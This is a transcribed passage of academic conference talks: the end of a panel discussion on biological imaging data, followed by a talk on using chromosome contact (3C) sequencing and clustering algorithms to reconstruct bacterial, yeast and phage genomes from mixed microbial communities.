from everything else that's going on. So I think that's where the power lies. And well, I certainly have a bias toward things that have to do with genomics because that's my background. I can think that other people who have interesting endocytosis or other things see unique places and want to understand what happens exactly here, not just everywhere. And that spatial temporal information is really powerful in understanding biology. I'll pass. Can I? I'm not sure this is working. Oh, it is working. Oh, great. So I was wondering about two related things and it's a question for some of you more than others, I guess. So there is this giant mountain of amazing data that's coming out. But I would argue that it is mostly available to people who produce the data, and then maybe a little bit to colleagues after it's published, but it's very hard for mathematicians, computer scientists, to get access to this data and play with it. So I'm wondering first, would you say it's important to invest into making this data very available for non-specialists, necessarily? And the second part of this question is, when you're looking at this, this is awesome complexity, this data. And we get to more and more and more layers of this awesome complexity. Would you expect that ultimately when we have maybe mathematical apparatus, maybe new language, new ways of looking at it, it would simplify? Is it your expectation that it looks so amazingly complex because of the units that we choose, cells and genes and units that we choose, molecules? You see what I'm saying? Is there expectation that once we understand there are laws which would bring it to beautiful simplicity? No, I think for sure. I mean, it's in the ultimately, like with the endocytosis model we saw today, it's simple chemistry that's driving it, but there's a lot of moving parts and you have to figure out what they are and then come up with a model, and then ultimately you should be able to formalize that. And so I think it ultimately will be very simple, but there's a lot of moving parts. That's a practicality, right? That's a practicality. The movies I show you today are the small movies that we have. There's a 30, 40, 50, 60 gigabyte, each one of those movies. Those are the small ones. We have data sets that are a third of a terabyte. One movie, we have a data set which is 14 terabytes. Tell me how do I, I mean, forget about putting in a database, right? Inside the lab. I don't even know how to look at these damn things, right? So we're having a major, major problem and this happens to be in our site. I think the same is with other big data things. So one day it will happen. I think maybe the answer is to have games. So there will be games for kids and they will use large terabytes of data than things could solve, right? I don't think that we can drive it based on science. It has nothing to do with compression. This is not a compression problem. Look, I have a movie like I show you, right? And I would like, I just would like to see, I would like to be inside of this fish and I want to watch the cell crawling towards me, okay? I don't know if you managed already to download this YouTube thing, because I think the internet is slow here. You will see that, right? But we try to do that in the lab. It's been very, very hard just to do the math, to do the VR, etc. It's non-trivial. I mean, you were asking me about mathematics. I mean, how do I make, I have, the data was collected all in the same intensity, but I need now to make it translucent with gradients, right? This is a mathematical problem and I don't know how to solve it. And when I talk to people, they all look to me and they glaze, right? So, yes, we need that. Alright, one final question here. Okay. I want to move away a little bit from the mathematicians. But to the team of this conference, it's from molecules to cells to human health. And you were defining today, where is the block in this, well, this steps from a molecule to a cure. And one of the things is that we cannot predict yet how a drug will act in a body and what type of effect it will have on different systems. And now, Tommy is showing these beautiful movies in which you can see multiple cell types. You can follow individual molecules. So, could it be that this next generation of movies and imaging could help us to overcome this step by looking at not just the effect of one cell, but looking on the effect of a system or a couple of cell types, maybe more complex structures like organites or different models that now are used for personalized medicine. So, what are your ideas on that? Well, certainly I would say that assays in more complex experimental systems are desirable. High throughput assays when possible, high throughput in this sense means thousands, not millions, because animal experiments in order to be reproducible take quite some resources. And those resources are rarely available to academics. And in drug companies, they're becoming less and less widely distributed. I don't really have a solution that sort of high and imaging approaches are appealing, but again today rather low throughput. I mean, when it takes a day or two to acquire a data set, it's not something that we can sort of routinely dedicate to high throughput kinds of studies. So, I'm afraid I don't have a simple solution. I guess one solution that I would have is let's try to make sure that the data we do have is widely available and in accessible formats such that information that is perhaps not very organized is perhaps in the literature, but not in a format that is available for most people, and most people becomes more so so that it can be used. So, I'm sorry I'm not able to answer in a more optimistic way, but I think that the challenges are great. Maybe the institutions that are in charge of funding need to think again about whether there are ways of making such data more widely available and collecting it. So, we're actually doing an experiment test to follow what you just said, right? So, we happen to be looking at infection, viral infection, and so that has a biological problem because when you infect, you present cells with viruses and the number of particles that a cell sees is very high, right? The MOI is very high, right? So, only one or two viruses will infect, but maybe hundreds of particles bound and were taken into the cell. So, now you want to see a drug that is interfering with infection. You know that that happened because you did the high throughput screen and it's fine, and you even know what the target is, you know everything, right? Now you would like to see what's going on, right? I think that the only way is to do the imaging, and we're doing exactly that, right? So, we track in many cells hundreds of viruses, you put the drug and you say, okay, where did I get the block and what stage, et cetera, right? It's a huge computational, I mean, very complex computational. It's non-trivial, right? But it's possible and it's happening, and I can see that we already, there's a virus called rotavirus, right? They give you diarrhea to the kids. So, we unravel the pathway of entry of the virus that way, right? It was confused because people were thinking they were taking in by endocytosis, and it turns out that that's not true. Particles are taking by endocytosis. The majority enter by endocytosis. A few particles are trapped in the plasma membrane and that's how they penetrate. No way you could have done it unless you see, right? So, that's my pitch, that. You see I'm a salesman. Well, I could tell you a story. So, I did my, just because we're mathematicians here, right? I did my undergrad, 50% in math and 50% in chemistry. And then a bunch of biology on the side. And I studied math because I knew I was really bad at it and I didn't, I wanted to learn something at university. And then at the end of my degree, the chair of the math department called me into his office and said, and you could tell, you know, they could tell that I wasn't a mathematician because I wasn't the sensitive ponytail guy. I wasn't, you know, reading a novel during my fuzzy logic class, like the brilliant daughter of mathematicians, friend of mine. Anyway, he said, you're not going on in math, are you, Charlie? And I said, well, no, like, you know, there's just no way. And he goes, okay, well, we don't want to slow you down your other career. So, we'll just bump this mark up a little bit. And if you promise never to take another math course, you can graduate today. Sadly, sadly, this I'm afraid is not a unique or unusual experience. Biologists do tend to have a fear of numbers and a fear of, well, the sort of challenges of mathematical formulas. Okay. Thank you so much.
|
John Christodoulou (UCL, UK) Charlie Boone (UToronto, CA) Tom Kerppola (UMich, US) Mark Hochstrasser (Yale, US) Tomas Kirchhausen (Harvard, US)
|
10.5446/50902 (DOI)
|
So first I want to thank you for this invitation. The first time I come here I used to live next door. So it's in Gifte Rivette on Orsay. So yeah, I'm a local but I never set foot in the institute so I'm very pleased to be here today. Thank you for this opportunity. So today I'm going to talk about mostly what is actually a technique that we have developed in my team. My team being mostly interested into the functional folding of genomes, mostly bacterial genomes, yeast genomes. But by working on these topics we ended up finding out that we can actually exploit the quantitative measurement of physical collisions between DNA molecules to solve genomics or metagenomics limitations that exist in these fields. So we are not coming from the genomics or metagenomics field but now part of my team is now working on these approaches by developing new methods. And so I will show you today how this works. So something common between all ecosystems in the world, whether it is the gut of a mouse or the mangrove in the French Caribbean, are the fact that they are colonized by complex heterogeneous populations of microorganisms, mostly bacteria but also yeast, worms, I mean a lot of different species. And these communities of organisms have important roles in many fields. For instance, the production of oxygen, recycling matters, depollution, bioenergy, etc., so they can have some industrial importance or just biological relevance. And therefore it is quite interesting or important for a lot of people to try to decipher the content of these communities to find out which bacteria is there, what are the genomes in order to understand the maintenance of the equilibrium of the ecosystem. I'm going to switch here because there are more people here than there. So to understand these ecosystems, so a lot of people are interested to describe them the more precisely possible to the full extent of their complexity. So you have many species coexisting together. You can also imagine you have phages, viruses, mobile elements between this that can be exchanged between some of these species. So it's quite important to be able to describe the structure to the full extent of its complexity. And this is where the field of metagenomic emerge at the convergence between genomes and sequencing, so very technical fields, how do you explore genomes from the structure down to the sequence, so high throughput sequencing, to the question what are the diversity of microbes in the wild. So metagenomics is a field that consists in sequencing DNA from the environment and trying to find out what species coexist with each other and trying to find out how they co-evolve or coexist in overtime. So these studies provide some hints about the genetic content of an ecosystem and also some hints, therefore, about the balance or the imbalance of the community. And then you can actually work about many things with these approaches. The way it is done so far is by extracting DNA from the population, from the ecosystem you are looking at. So you basically just extract DNA molecules that belong to different genomes, different organisms. And you do genome sequencing on this mix of DNA molecules. So you sequence a lot of short reads or even longer reads. So you end up with a big picture of the DNA present in the population. And to improve things a bit, because you don't know which molecule belongs to which, you can actually try to extend these short DNA molecules into longer DNA molecules that we are calling, that are called contigs. And still that don't represent full genomes because of the limitation of current assembly programs, because also some of these species share some identical sequences. So the program just failed to isolate the individual molecules from the original population. And because it's a very complex problem, you have to imagine some of these communities contain hundreds of species, therefore hundreds of genomes. And so it's quite impossible to assemble these DNA sequences into full genomes that provide you a good insight on the original community. So what people used to do is try to pull these contigs that are stretch of DNA of a few thousands of bases into pools of contigs that group these DNA molecules according to, for instance, covariance in different experiments. You look at covariance between the amount of these contigs you obtain after sequencing. So you can pull these guys together. You can look at the GC content, codon usage, different heterogeneous information present along these molecules that help you to pull these contigs according to specific features. It's a very imperfect process, and usually what you end up getting is many more pools of contigs that you have original sequences in the community. So here, for instance, you have six, for instance, let's say you have six bacteria. In the end, you will end up with nine communities of contigs, which is there is a discrepancy between the number of pools of contigs and the number of genomes you expect in the end. So there is actually a strong inability in this field to reach at a comprehensive genomic structure of complex communities, and therefore this limits the investigation of the dynamics and equilibrium of these ecosystems. So my team used to work on, I mean, is working on genome folding. And so what we noticed, and I will show you what I mean by that, is that obviously each sequence, DNA sequence in 1D has a unique 3D signature in the wild. So we can actually exploit this 3D signature to reverse, to go back to the 1D structure. So here is how we do it. So we use mostly an assay, which is called a chromosome conformation capture assay, which has been developed by Job Decker 15 years ago, that aims at trapping physical collisions between DNA segments along a genome, according to their collision frequencies inside a population of cells. So how you do that is you freeze the folding of DNA in each cell by adding a fixating chemical agent such as formaldehyde, that is going to generate covalent bridges between proteins and proteins and proteins on DNA. And therefore if you have a DNA molecule inside a cell that is folded like this with a protein complex here, you will generate covalent bridges between these proteins on the DNA, and therefore you will freeze the folding of this molecule in this cell. So if you have billions of cells or millions of cells, you have a population of frozen structures like this in your mix where you add this chemical agent. Then the trick was to digest these DNA molecules. Therefore you end up with restriction fragments, so short pieces of DNA fragments that are again fixed with each other according to their frequency of collision inside this population. And then when you add an enzyme called ligase that is going to religate these two restriction fragments together, you will end up with a molecule that is chimerae with respect to the original genome, but that reflects the fact that these two fragments, red and black, were actually close to each other in the 3D space. Okay? So then what you do is you purify all the DNA molecules, and you end up with a library of DNA molecules where restriction fragments, so DNA segments that were close to each other in 3D. How big a segment is your restriction? So it depends on the enzyme you use, but they can be between, let's say, 10 base pairs up to 2KB, 3KB. So if you use a frequent cutter, it will be mostly between 20 base pairs and 200 base pairs. If you use a 6-cutter, an enzyme that recognizes 6 base pairs, it will be between 500 base pairs on the 3KB, and it depends also on the GC content of the genome, so there are a lot of parameters there at play, but usually it's between 1KB and 1KB, let's say, on average. So for a long time, the limitation in this field was to quantify the respective amount of these events, because if you are able to have a global overview of the respective amount of all the religation events between all the DNA segments in the original population, then you would have a global overview of the average folding of the genome. That was the theory. And that was actually solved with the advent of high throughput sequencing, like Illumina sequencing, where basically you just plug sequencing adapters to the edges of these DNA molecules here, and you sequence one end of the molecule on the other end, and now you only count how many times you found in the library, for instance, the green fragment religated with the blue fragment, and actually with all of the other fragments of the genome. And therefore, you have the respective contact frequencies of religation between all the restriction fragments of the genome with each other. And this allows you to generate heat maps, contact maps, that reflect this respective ratio. So this is an example for the bacterial Vibrio cholerae, which contains two circular genomes, some approximately a four megabase genome. So here are the genomes, the chromosomes represented here under their linear form. And when you plot the contact between all the DNA fragments along chromosome one with themselves, you end up with this heat map here. So that's an intracromosomal contact map. This is intracromosomal contact map of chromosome two. Then you can also plot the contact between chromosome one and chromosome two. And here you have intracromosomal contact map. So this heat map is quite representative of what you get when you do this on any species so far, whether it is mammalian cells or bacteria or yeast. You have first a very strong diagonal that reflect the fact that the DNA molecule is a polymer. And therefore, two DNA fragments that are close to each other along this polymer are going to be related more frequently than to DNA fragments that are far apart from each other. Therefore, you have this strong DNA contact that DNA, sorry, this strong contact. You know, to really get the polymerized DNA, because it won't be close to the father, you have to coincide. Sorry? You have to be able to get the sticky ends must coincide more or less, yeah? Yes, it's okay. When the different ones are close to the father, they will be the same. So the contact frequency is more or less a power low. And so the further you go along, the further you will increase the distance between two de-reduction fragments, and it's going to drop very quickly. And this is actually a log scale. But the ligation depends on the sequences of the ends, yeah? Yeah, so you have some biases at this level, a few biases which are kind of characterized, and they are not strong enough to kind of affect the outcome of this result. You may have issues if you have very high GC rich genomes. Actually, the sequencing is going to be affected as well. Like the Illumina sequencing may be problematic on highly rich GC or so. So there are biases, but overall, it will not affect the general trend, which is that two fragments close to each other along this polymer are going to be frequently in contact and two fragments far apart. Like here, I'm not going to be frequently in contact. So here, the color of scale reflect the fact that rare contact are in white, frequent contact are in red. But it also depends on the stage and the cell cycle, yeah, how they're positioned. Yes, so that's exactly, yeah. So this will modify, for instance, the width of this diagonal. If you go into metaphase, you will increase the width. If you are doing replication, it will look like this. So indeed, there are some functional events that you can actually identify in this contact map. And this is something we are working on in different species. For instance here, so the chromosomes are circular, meaning this position here is adjacent to that one. That's why you have this contact in the edges of the maps. And also, also related to functional events, you can see here, for instance, you have contact, it's very weak, but you have contact between the middle of this chromosome two and the middle of chromosome one. And this corresponds to the termination of replication position of these two chromosomes. And you can actually ask why do these chromosomes see each other in space. You also have one specific contact here between the origin of chromosome two and the position of chromosome one. And that relates to an original control of the firing of replication of un-chromosome two by the progression of replication fork around a long chromosome one, which seems actually mechanically related. So this is something we are working on in collaboration with DJ Mazel at the start. But today what I want to insist on is that in all genomes you have this very strong diagonal that reflect the fact that these two chromosomes are polymers and therefore in the space, in the cellular space behave as relatively individualized entities. So the question we asked at some point when we were working on this was, okay, so what happens if we do this same experiment on a mix of species? Will DNA fragment from genome one is going to be in contact by accident, by experimental procedure biases, be related frequently with the genome of fragment of genome two or genome three? Or is this relagation events are going to be sufficiently low? No, because the restriction on time it cuts the same site, so you have a cohesive site. So if you use a cohesive end it will relagate very efficiently. If you use a blunt cut it's not so efficient. So the question we asked was whether or not these restriction fragments are going to be relagated often with each other from the different genomes and therefore blur the signal. So what we did was to do a preliminary experiment where we took three different species, again viviocollerae, H.C. and basilis subtilis. We grew them independently and we mixed them together, the cells together and then we performed this genome 3C experiment directly onto the mix of species. Until then we take the reads from the parent reads and we align the reads against the reference genomes of these three species. And then we look at the contact pattern between these genomes and within these genomes. And when we did that we were quite pleased to see that actually there is very little background between the different species. So that means that it's very rare, I mean it's relatively rare that one fragment from species one is going to be relagated by accident with a fragment of species two. And the relagation may occur just because when you lyse the cell and you just process the cell biochemically you may just disrupt the genome and have a fragment floating in the solution that will just relagate spontaneously with each other. So this doesn't happen very often. And therefore you have well individualized squares in the main diagonal that correspond first to the genome of basilis subtilis. Then you have this square here that is the genome of E.coli. You can actually see that there is also a tiny square there that correspond to a plasmid that sees a lot the genome of E.coli. And so that tells you that this plasmid probably shares the same cellular space as the genome of E.coli. And here you have again the two chromosomes of vibriocholary that also see each other in 3D very often and therefore you can actually pull them together inside the same cellular space. So we can be convolved in a sense the genomes of these three different species from this heat map. Why is E.coli different qualitatively than the other? So the coverage may be at play here and it was a very preliminary experiment. So there may be some differences in the amount of cells we put even though we thought we put the similar amount of cells maybe we just did some little mistakes. And also basilis is a gram plus bacteria. These are gram minus bacteria and it seems to be slightly easier to extract DNA from gram minus bacteria than gram plus. So therefore the coverage of basilis is lower in this experiment than these two guys here. So you're attributing this spread of the... The thin line here. So is the diagonal is much more... The diagonal is also a matter of color scale here. It's the same color scale for the entire map and therefore you kind of blur. And it was again a very early experiment. So basilis doesn't look like this. We did work on that. I will show you maps. It's much nicer than this one. Okay. So let's keep that. So what does the thickness of the diagonal mean? So it means that it can be interpreted somehow as a condensation level. It's not totally true but you can actually visualize it as a kind of measure of condensation of the chromosome. So if condensation is high to DNA fragment that are far apart are going to be more frequently connected with each other than if it's very decondensed. That's one way to see it. So what we did then was to do the same kind of experiment with 11 species. Therefore 11 genomes and these are yeast genomes. So each genome now is composed of multiple chromosomes. So we pulled all these species together inside a mix and we did the metagenomic assay that I know sorry the metatricy assay as we call it directly on the mix. So when we aligned the reads again against the reference genomes of these species we were pleased to observe that there are indeed 11 big squares in the main diagonal that correspond to the genomes of these species. Some of them are not as well covered as others. Again you can see differences but this is not very significant. But again here we aligned the genomes against we aligned the reads against the reference genomes so we kind of cheat. We know the answer. So what we wanted to do was to do a design an assay that would allow us to start. Excuse me but for these you don't have any common sequences or any common placemates or any kind of... No here there are no placemates. We don't have placemates. But each of these big squares is composed of smaller squares that correspond to the individual chromosomes present in each species. On the dot also just so you know in yeast... You heard it yesterday so you probably talk about that maybe but centromeres are collocalized in the nucleus and therefore the DNA next to the centromere is colliding with the other DNA quite often. Or you can see clusters of centromeres which are these dots in the contact maps. In the case of cerevisiae you would have the tumor complacemate. Yes but we don't align it. So there may be a placemate there but it depends on the strain I guess. For this strain certainly. Is there cerevisiae? Yes. Can you count the number of chromosomes and it will be... Yes so I will show you what we do now which is actually exactly that. So what we wanted to do was because this is kind of nice but it's kind of useless if you want to explore something very from the wild where you don't know the content in genomes. You cannot align the reads against reference genomes if you don't have the reference genomes. So what we wanted to do is to design a protocol, a computational protocol where we would start from the reads. So only the parent reads and we would like to see whether we can go down to the genome of all of these species. So we start here only with the raw sequences which are the parent reads that reflect the contact frequencies between all DNA in the population. So what we can do is we can first try to increase the size of this small DNA reads so we can use standard assemblers like DBAUD that are going to increase the size of the chunks of DNA we have. Therefore we have a set of contigs that we can work on. The other information we have besides the DNA sequence in this set of reads are the parent information which correspond to the contact between the DNA molecules from the design of the 3C experiment. So now what we can do is we can also align the contact information on this set of contigs. And that gives us a network of contact between this set of contigs. So we have this network which is pretty big and so a nice way to analyze network is to use the Louvain algorithm which is going to partition the network to optimize the modularity of the network partitioning and look for communities of contigs that see each other very much inside this big network and don't see the rest of the other communities very often. And so we work with this Louvain algorithm, we design a protocol that allows us to actually segregate these pools of contigs into 11 communities of contigs. Just by using the standard algorithm we ended up getting 11 communities which is actually the number of yeast species that we originally put into the mix. We also had a contaminant like a Nicolai genome here, 1%, which is probably coming from one of the cultures of yeast we did at the same time. So that's okay. So most of these contigs just see each other within the same community and they don't see the contigs of the other communities very much. Can you please repeat the nature of the ages in your interaction network? The ages are the contigs and the number of contacts between the contigs are going to be the nodes. So the age, you put an age between this and another contig in case of what? But we know that the number of contacts is going to reflect the collocalization in the same cell. So we just segregate. And so that works relatively well but here we have pools of contigs and if we take one of these communities, we look at the contact between these contigs. This is what we get. So here we have 1000 contigs. And of course we don't sort them according to their position along the genome because we don't have the reference genome. So when we just align the contigs, the reads against the contigs and we generate the contact map, this is what we get. It's a very messy contact map compared to what I showed you before. And so here I will introduce another algorithm we designed at the same time that allows us to reorder these contigs accordingly to their contact frequencies and therefore try to resort the, to rescap the genomes of these species. So this is a program that we call the GRAL that was designed by a disfiant in my group and that, this is like an interlude, that aims at scaffolding contigs based on their contact in 3D. So the situation we have here is the same as if we had the contact frequency between a non-fully assembled genome. Most genomes are not fully assembled. And therefore when you align the reads of a contact experiment against the reference genomes, you have this messy contact map where, because you don't know here that the green contig is adjacent to the green one here, you will not position these two guys next to each other along the axis. And therefore you will have this strong intercontic contact here in the contact map that is actually incongruent with what we know about polymer physics of the polymer property of the DNA. So on time for the red chromosome here which is split into three contigs here, there and there, you will have this incongruent contact signal at far, I mean long distance in the contact map. So what you want to do is to solve this puzzle. So here it's quite simple. You can solve it by hand. So for instance here you can take the green contig there. You look at the contact made by this position and you see it makes a lot of contact, the white position here with this guy. So you will position this edge next to that one. And now you have a longer scaffold and it looks good on the map. But you may have long distance interactions. Yes, so you may have long distance interactions which are maybe functional, for instance like the centromeres in yeast. But this long distance functional contact are always much smaller than the very strong polymer behavior of the chromatin. So this diagonal contacts are always two fold, two log higher than the contact you see at longer distances. And then what you want to do for instance with the blue guy, you take this contig here and you see it sees a lot this edge there. And therefore you will have a red guy. Anyway, you get the idea. You just resort the contigs until you get only squares in the diagonal. And you minimize the signal outside the main diagonal. So this is easy to do by hand, but it's actually more tricky to do with real data and with a very big complex genomes. So what we did was to design a program that used this contact, which are very quantitative contacts on polymer physics prediction to explore the space of genome structures and identify the genome structure in 1D that reflects the 3D data with the highest likelihood. So that's what they did. So again, this is for instance the power law and we noticed so if you know the contact frequencies between two DNA fragments and you have the contact decrease according to the genomic distance along the genome, for a genome, if you know the contact frequency, you can actually guess with a very high accuracy the distance that separates the two loci you are looking at. So here for instance you have a contact around 100 and then you can say, OK, so these two guys are, no sorry, contact would be like 50 and then you say, OK, if I have a contact of 50 between two segments, it means they are separated with a certain likelihood by 100 KB in 1D. So Hervé designed this program which starts only with the 3D data and is initialized with a polymer model because at first we don't have contigs big enough to compute this power law, this distribution, which changes depending on genomes slightly. So at first we start with a polymer model on the data on the original genome. So the set of contigues that is not fully scaffolded or that has been published or that we have generated. And then it's going to screen through the genome structures in 1D trying to improve the likelihood of the structure by fitting the 3D data on it and computing a new measurement of the fit between the data and the 1D genome structure. So we are going to sample the space of genome structure in 1D and compute for each time the new likelihood. So this is the likelihood on the wide axis. This is again here and this is the increase of likelihood according to the iteration of events. So we basically make small changes in the 1D structure and for each small change we compute the likelihood and then we take the best likelihood structure, I mean the most likely structure and then we converge towards the situation where we are actually oscillating around one D genome structure and this is just a movie that illustrates this process. So this is a genome that is actually that was published as a set of 76 contigs. So it's scaffolded. So 76 big pieces of DNA. And so fungi and we know that this species doesn't have 76 chromosomes. So there are more chromosomes and also more contigs published than number of chromosomes. And when you do the 3D data you can see clearly that indeed something is wrong with this contact map, it doesn't look right. And here we have illustrated the 76 contigs that were published. So what we want to do is to reorder this DNA fragment according to the 3D contact and converge towards the most likely 1D structure. So the first part of the program is actually splitting these big contigs into smaller pieces because we actually assume that there are some assembly errors in the first place that were published. And so therefore we cut this big DNA fragment into pieces of 10 kb and we just start to reassort them according to their collision frequencies. So the first part of the movie is just doing that and randomizing it for… So we just split this DNA fragment into tiny pieces and then here's the likelihood and that's the number of contigs. And we start to explore 1D structures and improve it in likelihood. And in the end we are starting to converge towards a state where we have 11 big chromosomes, I mean big chunks of DNA. And we have a contact map now that accordingly represents something that looks like yeast or fungi genome. So here when we stop the program, sorry not 11 but 7 chromosomes, yes, right, it didn't go down to the end. Okay, it stopped. Yeah, it stopped, one of them should be, but it doesn't matter. Well, anyway. So when we stop the program, which is oscillating forever around the same structure, we actually get this genome structure, 7 chromosomes. We have contact that looks very much like inter-centromeric contact, which is totally expected for a fungi at this stage and like this dot here, we can actually identify the centromeres by looking at the position of these dots along the sequence, etc. And so we can actually scaffold this genome pretty efficiently and this is actually the real genome now, we checked it independently. And we can do that actually for other species and so this is just an example of unpublished data. It doesn't just work on big, I mean on small genomes like this fungi, but this is the parasitoid wasp. This is a collaboration with Jean-Michel Dresden in Angers, where when we do the 3D contact between the chromosomes of these wasps, we have this very messy contact map. This is a published genome made out of thousands of contigs. You can see them here. Each of the contigs is making a square, but then you have all these inter-chromosomal contact contacts that we want to solve. And the program is also able to do that pretty efficiently, so I'm just going to go quickly. But again, we are just resorting the chunks of DNA according to their collision frequencies and this gives us a relatively robust scaffold in the end. So it takes a bit longer. Here, so when we do that, we end up getting relatively nice scaffolds that actually correspond to what is expected from cytology data. So we were able, by exploiting the collision frequencies between these DNA fragments, to rescapable these genomes in a way that matches the expected cytological data. So now our collaborators can look at their favorite genome sequences, such as viral sequences that contribute to the parasitoid process of the wasp. The wasp disrupts the host immune system to, I don't know if you say pond, but to send the eggs inside the caterpillar it is infecting. So these viral sequences are important for the reproduction of the wasp. Anyway, so going back to this metagenomic assay, we did this program, we run this program on this 1000 contigs and to get it short, we end up to get something that looks like a yeast-genome contact map. And when we compare this contact map with the reference genome, we have 95% of the reference genome covered by this heat map. So in one single experiment, we were able to actually isolate 11 genomes from this mix of species and rescapable them with approximately 90% accuracy compared to what was published. So that's what was quite promising. And here I'm going to show you the real experiment. This is not a control mix. It is done on the gut of a mouse from the Pasteur Institute animal facility. It's not a very exciting sample because, again, we were not microbiologists at this time, but so we took this one single species of this mice and we performed the metatrissi assay, the contact assay directly onto this single species. So we were able therefore to assemble this DNA reads into contigs. And here it's a very big network. We have 400,000 contigs. It represents approximately 600 megabays of DNA. The N50 is around 4KB. So the contigs are relatively small. Again we can, so when you look at the contact map of these contigs, well, okay. Again we can use the parent information to bridge these contigs according to their contact frequencies. And we have this network of contigs that contain 45 million contacts. So it's a very complex network. And this is how it looks like when it's not sorted. What we did again was to partition this network using a Louvain clustering algorithm. And when we saw this network using Louvain, we were able to get nice communities of contigs that present more contacts inside each other compared to outside with each other. So each of these squares correspond to a set of DNA sequences that collide more frequently in space compared to the other ones. Okay, I'm going to skip that. Okay. So what we did next was to investigate the content of these communities. And first what we can do is to align the genome annotation against the DNA present in all of these communities. So the communities are sorted by size. So of course we have small communities of a few contigs. Start from one up to one of the contigs. But most of the DNA is being actually pulled into the large communities of contigs that contain above 1,000 contigs. So they are like more than one megabase of DNA. And so of course since most of the DNA is present in the large communities, most of the gene annotation is going to be present to correspond to the large communities. So therefore this is what you see here. Most of the genes are actually present in the biggest communities. This is not very interesting. If we look at bacterial essential genes, again, most of the bacterial genes, essential genes are present inside these large communities, suggesting that these large communities correspond to bacterial DNA, which is again not totally unexpected. The interesting thing was when we look at phage-related DNA or plasmid DNA or conjugative DNA, we actually see an enrichment as well inside the smaller communities. As if, of course, the phages are in contact with the bacterial genomes, the bacterial genes, because some of the phages are integrated in the bacterial genomes like prophages or some phages are maybe infecting the bacterial genomes. But also some phages behave as individualized entities that in space are being actually trapped on themselves or not with another molecule. So that was quite interesting. So we decided to analyze these two sets of communities independently. First the large ones and then the smaller ones. And so what we observe, for instance, if we take one of these large communities, so this is a 68. Again we have this messy contact pattern. We can improve this pattern by working with the program we designed, Graal. And in the end we end up with a scaffold of approximately four megabays of DNA, a single scaffold that presents this kind of pattern. So you have here the large diagonal. And interestingly you have also a secondary diagonal. And I will show you why this is interesting. It's because at the same time we are working on basillus subtilis on this kind of 3D folding of bacterial genome. It's typical of bacteria like basillus subtilis. So first this origin of replication is positioned at the crossing between this secondary diagonal and the main diagonal. You have more DNA around the origin of replication compared to the termination of replication which corresponds to a bacteria that is actively dividing. So you have more DNA at the or that at the termination of replication. And the secondary diagonal reflects the fact that the two chromosome arms, even though they are bridged there, they are actually colliding with each other more frequently because they are being bridged by cohesines as we actually showed in basillus subtilis. So when you start replication you bridge the two chromosome arms and they are actually maintained in close contact with each other during the cell cycle. And this is what is reflected by this secondary diagonal. So this is actually typical of the 3D structure of bacterial genomes like subtilis. So these are another community, another one and so on. This is more like the E. coli bacterial chromosome where we don't have the secondary diagonal. So this is like basillus, this is like E. coli. But we get DNA structures that all look like bacterial scaffold genomes, 3D structures. So in one single experiment we are able to recover dozens of bacterial scaffolds which is actually, I mean until now it was not, you cannot do that in this field. You need to have multiple samples and you need to do a lot of correlation analysis. But here in one single experiment we end up getting 100 of bacterial genomes, relatively complete. And at the same time what we did was to analyze the content of these small communities which were the phages, I mean that looked like phage. So here we took 72 small communities that contain mostly gene that are phage genes. And we reprocessed the data a little bit. And we look at the sequences we obtain for these 82 communities. And so these are different examples of these 82 communities. So one of them for instance is a 235KB genome that looks like a FKZ genome, it's a phage. These guys here correspond to two molecules of 25KB which are also good size for a phage genome. This is 50KB like a Codovirales genome, etc. So we have genomes of phages in this community of species that we can now actually try to relate with the potential host which are the bacterial genomes. So we have in one hand bacterial genomes and in the other hand we have the phage genomes. And so now what we can do is to plot the contact in 3D between the phage and the bacterial genomes. And this is what we do here, we have the 82 phage sequences and the 100 something bacterial sequences. And this is what we get now, we have a good overview of the infection spectrum, global of infection spectrum in the community. So this is quite important because now what we can do is to do this kind of experiment over time and look at the propagation for instance of a virus in different bacterial species or closely related bacterial. We can also look at genes of interest, for instance an antibiotic resistant gene which is present in one of the species and then if we treat one of the community with, we give antibiotics to a patient, then we can look at the propagation of this phage, sorry, of this gene, antibiotic resistant gene inside the population of bacterial species and see if at some point it will induce some dramatic stress in the population of bacteria. We can look at the activation of profages depending on stress, etc. So it opens a broad range of studies which until now were quite difficult to address because there was no good way to bridge the virum, so the phage sequences, to the microbiome which is the bacterial sequences. And also we did not have the full genomes of this bacteria so it's difficult to look at interplay between metabolic networks in this complex communities. So this is, I don't know how long, what time is it? Five more minutes. So this is just another little observation is that we also have profages inside the bacterial genomes so that don't correspond to this individual, necessarily correspond to these communities of phage sequences but we can actually observe also some phage sequences in the bacterial chromosomes that correspond to profages most likely. And so here in red this is the annotation of the phage sequences and you can see clusters of phage annotation in this bacterial chromosome that actually correspond to this weird pattern in the 3D contact. And so these are typical of phage sequences inside these bacterial genomes, maybe differences in AT composition which affect the outcome of this experiment. And what we showed is that for instance in bacillus subtilis, this is a phage here, SPB beta, which also present this weird pattern. So the AT composition of this sequence is different from the rest of the chromosomes so the restriction is going to be affected and therefore the contact pattern is going to be affected. And what we showed is that if we stress this bacteria, the phage now is actively dividing and is actually very prominent in the contact data. So this is again in controlled experiment of bacillus subtilis and we can actually observe also the increase in sequence coverage of this prophage here. And so that tells us that this prophage is actually actively dividing in this bacteria, is actually liaising probably the bacteria. And when we go back to our unknown data from the world, we can actually observe similar patterns. For instance here we have a prophage that doesn't seem to be activated, the coverage is actually flat compared to the rest of the chromosomes. But here this guy there seems to be actually actively dividing, so maybe this prophage is active, this one is not active. And so we wonder if we may actually guess the activity state of the prophage sequences inside the bacteria again in this single experiment. So that would be also interesting. So this is the experiment we are doing now along with others, either with wild type mouse or with mouse with controlled mixes of species like 13 species or more. And we can for instance treat some of these mice with antibiotics. We can change the composition of the gut by adding for instance a species with an antibiotic resistant gene, etc. And so now the idea is to sample the species of this mouse at different times and track it in 3D, in 4D actually, so in 3D over time, the propagation of genes, the activation of prophages and reach at a comprehensive picture of the dynamics of the population. And so this is where I'm going to stop. This is just a very preliminary data where we observe that the lines here correspond to phage, let's say the 5 phages present in this bacteria, which is one of the 120 bacteria present in the gut in this mice. So this is one of the bacteria on the phage behavior is represented with this line, the 5 phage that present there. And actually one of the phage actually seems to behave very differently from the rest of the DNA fragments and over amplified so that may point out when we treat with antibiotics. The activation of this prophage that may play a role in the lysing of the bacteria or the dynamics of the population. So now we are trying to integrate all of this data. It's quite complex. I mean for us it's complex because we are not used to work on these things, but to try to integrate all of this data together to get at this comprehensive picture. So again, so what I showed you was that this contact frequencies can be used of course to analyze the biology of the chromosome, but we can also develop this alternative approaches that helps us to breed the microbiome with the biome and get this improved understanding of ecosystems, complex ecosystems over time. So these are people who did the work. Most of the experiments were done by postdoc in my lab, Martial, who now got a scenario as position two years ago, excel an 